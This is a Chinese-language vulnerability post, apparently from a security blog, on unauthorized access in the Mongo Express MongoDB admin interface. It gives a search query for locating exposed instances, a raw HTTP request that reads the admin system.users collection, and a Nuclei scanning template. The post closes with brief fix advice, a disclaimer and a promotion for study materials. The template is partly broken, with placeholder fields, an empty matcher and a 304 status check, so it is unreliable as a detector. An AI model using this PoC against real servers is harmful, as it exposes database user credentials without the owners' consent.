【产品&&漏洞简述】
Mongo Express 是一个基于 Node.js 和 express 的开源的 MongoDB Web管理界面。Mongo Express存在未授权访问漏洞,攻击者可通过该漏洞获取用户信息或修改系统数据。
【资产测绘Query】
title="Home - Mongo Express"
【产品界面】
【漏洞复现】
【poc】
GET /db/admin/system.users HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
If-None-Match: W/"5e20-VrulkRjFFAf+sQ5IpKaq4NjOD4E"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: mongo-express=s%3AaH0WpZ2GRKB665ZQKhEnS98aZA5mUtId.WHpfctkSF3uWQChONtpocl8cdsU26scI0WDBOeNdtIQ
【Nuclei-Poc验证】
id: mongo-expressress-unauthorized
info:
name: Mongo Express unauthorized
author: admin
severity: high
description: description
reference:
- https://
tags: tags
http:
- raw:
- |+
GET /db/admin/system.users HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
If-None-Match: W/"5e20-VrulkRjFFAf+sQ5IpKaq4NjOD4E"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: mongo-express=s%3AaH0WpZ2GRKB665ZQKhEnS98aZA5mUtId.WHpfctkSF3uWQChONtpocl8cdsU26scI0WDBOeNdtIQ
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- ''
- type: status
status:
- 304
【修复建议】
1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
免费领取安全学习资料包!
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线